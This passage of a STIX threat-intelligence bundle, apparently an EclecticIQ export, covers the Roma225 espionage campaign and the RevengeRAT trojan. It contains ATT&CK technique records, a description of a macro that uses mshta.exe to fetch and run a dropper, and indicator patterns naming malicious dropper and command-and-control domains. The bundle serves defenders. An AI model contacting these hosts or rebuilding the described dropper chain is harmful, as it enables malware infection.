[[Technique\/T1077|Windows Admin Shares]] for RPC communication.",
"created": "2019-03-06T12:07:27.250Z",
"id": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:17:02.750356+00:00",
"estimated_threat_start_time": "2018-05-15T15:17:02.750356+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:17:02.750356+00:00",
"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Targeted Technology",
"Targeted Technology - Operating Systems",
"Targeted Technology - Windows"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - Mitre"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Theme",
"Theme - Generic Threats"
]
],
"title": "Technique\/T1112: Modify Registry",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-44a0e88c-1951-5a12-b907-a9d1e34c06b7",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.107Z"
},
{
"labels": [
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"admiralty-code--probably-true",
"industry-sector--automotive",
"threat-actors--espionage",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"theme--generic-threats",
"source--eiq-fusion",
"kill-chain--target-manipulation--weaponization",
"theme--financial-crime",
"theme--apt"
],
"name": "Attack Pattern: Install a RevengeRAT variant and execute a series of malicious actions",
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "1123",
"description": "Obtain\/re-use payloads "
},
{
"source_name": "mitre-attack",
"external_id": "1060",
"description": "Registry Run Keys \/ Start Folder "
},
{
"source_name": "mitre-attack",
"external_id": "1170",
"description": "Mshta "
},
{
"source_name": "mitre-attack",
"external_id": "T1112",
"description": "Modify Registry "
},
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "<p> <\/p><p>The macro code in the .ppa file contains a simple instruction invoking the \u201cmshta.exe\u201d tool to download and execute the next-stage of the dropper retrieved from \u201c<em>hxxps:\/\/minhacasaminhavidacdt.blogspot[.]com\/\u201d.<\/em><\/p><p> <\/p>",
"created": "2019-02-23T16:30:24.836Z",
"id": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2019-02-23T16:30:24.300862+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Kill Chain Phases",
"Kill chain phase - Installation"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Kill Chain Phases",
"Kill Chain - Target Manipulation - Weaponization"
],
[
"Theme",
"Theme - Financial Crime"
],
[
"Theme",
"Theme - APT"
]
],
"title": "Attack Pattern: Install a RevengeRAT variant and execute a series of malicious actions",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-70108184-2109-4463-a68d-41cd48ab65ad",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.108Z"
},
{
"id": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure"
],
"pattern": "[domain-name:value = 'pocasideiascdt.blogspot.com' AND url:value = 'https:\/\/pocasideiascdt.blogspot.com\/']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "https:\/\/pocasideiascdt.blogspot.com",
"created": "2019-01-08T11:36:45.131Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:23:37.963043+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "https:\/\/pocasideiascdt.blogspot.com",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-08e47db5-be65-439d-8c8c-2243d60ea831",
"type": "indicator",
"modified": "2019-03-06T12:13:36.109Z"
},
{
"id": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"labels": [
"admiralty-code--fairly-reliable",
"admiralty-code--probably-true",
"industry-sector--automotive",
"threat-actors--espionage",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"source--eiq-fusion",
"theme--apt"
],
"name": "Roma225 - Target companies in the Italian automotive sector",
"first_seen": "2018-12-27T05:00:00Z",
"description": "<p> <\/p><p>The Cybaze-Yoroi ZLab researchers investigated a recent espionage malware implant weaponized to target companies in the Italian automotive sector. The malware was spread through well written phishing emails<\/p>",
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"created": "2018-12-31T16:12:35.368Z",
"modified": "2018-12-31T16:12:35.368Z",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2018-12-31T16:12:34.879280+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Theme",
"Theme - APT"
]
],
"title": "Roma225 - Target companies in the Italian automotive sector",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}campaign-88548ad1-1cb2-49c9-822e-a854868ec650",
"type": "campaign"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"theme--generic-threats",
"theme--apt",
"industry-sector--government-national",
"source--eiq-fusion",
"industry-sector--defense",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"threat-actors--apt"
],
"name": "Malware: RevengeRAT",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "<p>Off-the-shelf remote access Trojan<\/p>",
"created": "2018-11-13T17:07:33.945Z",
"id": "malware--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-11-13T16:08:55.483257+00:00",
"estimated_threat_start_time": "2018-11-13T16:08:55.483257+00:00",
"half_life": 9999,
"ingest_time": "2018-11-13T16:08:55.483257+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Theme",
"Theme - APT"
],
[
"Industry Sector",
"Industry Sector - Government National"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Defense"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Threat Actors",
"Threat Actors - APT"
]
],
"title": "Malware: RevengeRAT",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-349762e7-0223-464d-b3dc-4b561e2bd789",
"type": "malware",
"modified": "2019-03-06T12:13:36.112Z"
},
{
"id": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"malware--remote-access-trojan",
"theme--critical-infrastructure"
],
"pattern": "[domain-name:value = 'systen32.ddns.net']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "systen32.ddns.net",
"created": "2019-02-15T14:10:16.586Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:38:39.652722+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "systen32.ddns.net",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-56bb4eb2-142e-4ec8-aa56-64c75249be33",
"type": "indicator",
"modified": "2019-03-06T12:13:36.112Z"
},
{
"id": "relationship--6a5d35fe-a4ba-528d-add7-558b603b9d30",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--e1a3c8e6-8880-5001-938c-45f05978900b",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--8947397c-aef5-547d-bafc-bc702c6205b6",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--ef97960a-a76e-5009-91d4-a11bfcddd4c0",
"relationship_type": "x-indicates",
"target_ref": "identity--ef97960a-a76e-5009-91d4-a11bfcddd4c0"
},
{
"id": "relationship--0668c69d-000e-5535-ab8e-64b1baf8a865",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "indicates",
"target_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f"
},
{
"id": "relationship--c21abdc5-e3cf-5d50-8ce8-096c5ef8140f",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"relationship_type": "indicates",
"target_ref": "malware--46142e30-38e6-5c0e-b2e4-ffcfbc443426"
},
{
"id": "relationship--3dc47196-6795-5b82-b6b3-d3c3f3f5e9a5",
"created": "2018-12-31T14:45:13.425Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-19a466c3-6f39-4347-8bc0-9a0a8d74ad4d",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"relationship_type": "uses",
"target_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb"
},
{
"id": "relationship--491d9cff-4603-5c95-847d-677b1fc8f219",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "attack-pattern--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--01760b0b-9af0-5768-b3a7-9b34aa3a64db",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "tool--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--fa0e0ce1-fd38-50b9-841e-64173f761693",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "malware--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--cdf5e2d3-9f0f-5ded-9940-9cc61a7d911f",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.116Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "targets",
"target_ref": "identity--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--08313bd1-6a8f-5477-84e1-a095a8a2ebcb",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.116Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "attack-pattern--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--eab7b416-fd39-5e96-91a1-d05c7136fa62",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.116Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "tool--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--9ee00cb2-b298-5bd6-815b-35102a420019",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "malware--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--b555e47e-8103-5d20-b575-c9c8225f805d",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "targets",
"target_ref": "identity--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--cd48960f-b790-52e9-b9fb-4a087fc5e09f",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "uses",
"target_ref": "attack-pattern--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--3857620f-aee2-5f84-8619-4b9d4766ab01",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "uses",
"target_ref": "tool--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--516160bd-467e-52d8-b55c-76fa4f216c72",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.118Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "uses",
"target_ref": "malware--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--567d3362-c71b-54e8-9818-90f403bb7113",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.118Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "targets",
"target_ref": "identity--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--99824817-d541-59d8-9ca7-ae07b48499c9",
"created": "2018-12-31T14:45:13.435Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-749c474f-710d-4018-8735-1c1e757986a3",
"type": "relationship",
"modified": "2019-03-06T12:13:36.118Z",
"source_ref": "indicator--24bb51ea-2fb9-587a-86e8-7b0f34e013ae",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--dcbf8a7c-d402-52d3-8a2e-395c2cd2cd41",
"created": "2018-12-31T15:58:19.428Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-4190cb35-5198-436d-8801-00f7340836f9",
"type": "relationship",
"modified": "2019-03-06T12:13:36.119Z",
"source_ref": "indicator--6880007b-2a92-56ef-becb-59973a1f8ad6",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--620836cf-9609-59d4-a66e-70ff0a2ae0e4",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.119Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "uses",
"target_ref": "attack-pattern--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--d4166856-5ff1-5243-b306-9677443c168d",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.119Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "uses",
"target_ref": "tool--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--83c51a38-0482-5e8a-9b97-068b8a33e3fc",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.120Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "uses",
"target_ref": "malware--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--07f05148-f91d-5f94-a4a9-d41a30269fc4",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.120Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "targets",
"target_ref": "identity--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--cedac113-b104-58b1-9086-d72ad865f5e9",
"created": "2018-12-31T15:24:47.327Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e033868c-df66-4292-ad48-022789a197d4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "indicator--e676bc18-efa3-5a34-99e7-61a53d3e1f67",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--3591d186-1331-5372-b0cc-f4fcd5780a97",
"created": "2018-12-31T15:58:53.036Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-9f489a37-b8e1-4589-aab0-a84369c47de4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "indicator--cc6fe40d-af7d-5a9c-bde1-b151101f5c1d",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--ed05117e-6431-5960-b6b9-c9c87b9e0c94",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "uses",
"target_ref": "attack-pattern--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--c5315d97-cbf2-599d-91f5-c5d7e3b90d46",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "uses",
"target_ref": "tool--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--a0e57418-2f40-5205-9609-e55bdce0323a",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.122Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "uses",
"target_ref": "malware--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--1bb207de-81c8-5fb8-8c97-61267ef1e938",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.122Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "targets",
"target_ref": "identity--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--5d46c0cb-ddc6-5f12-a6bf-cf92ab2b8c77",
"created": "2019-02-23T16:30:27.089Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-36001371-3f8f-4d65-aa8c-2d3500ccff26",
"type": "relationship",
"modified": "2019-03-06T12:13:36.122Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d"
},
{
"id": "relationship--3994e5fc-fd1e-5b7e-aadc-9faff113def0",
"created": "2019-02-23T16:30:27.161Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-57fcb3dd-c212-4131-92c8-7979a0fd8eca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.123Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260"
},
{
"id": "relationship--ff30afd9-fa6b-5300-8f34-453bf81da5b2",
"created": "2019-02-23T16:30:28.083Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-341229e3-beca-4ae5-a155-318230c8b110",
"type": "relationship",
"modified": "2019-03-06T12:13:36.123Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb"
},
{
"id": "relationship--f1df5482-d56a-5e2c-8255-081a04b104ec",
"created": "2019-02-23T16:30:28.127Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-99369313-afb6-439f-9a1b-49ffabf69b87",
"type": "relationship",
"modified": "2019-03-06T12:13:36.123Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943"
},
{
"id": "relationship--706afce1-5636-519e-be1b-040fb6824a45",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.124Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--b75ac87a-72e1-5f90-8733-530fffc15017",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.124Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "tool--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--91cb8994-9132-5663-b24c-8a8f7e530ecd",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.124Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "malware--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--6bb1fbc0-537f-5487-b6c5-60071736e8af",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.125Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "targets",
"target_ref": "identity--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--8e4abab0-84f4-5993-9652-93dafbcdb5b4",
"created": "2018-12-31T15:23:42.721Z",
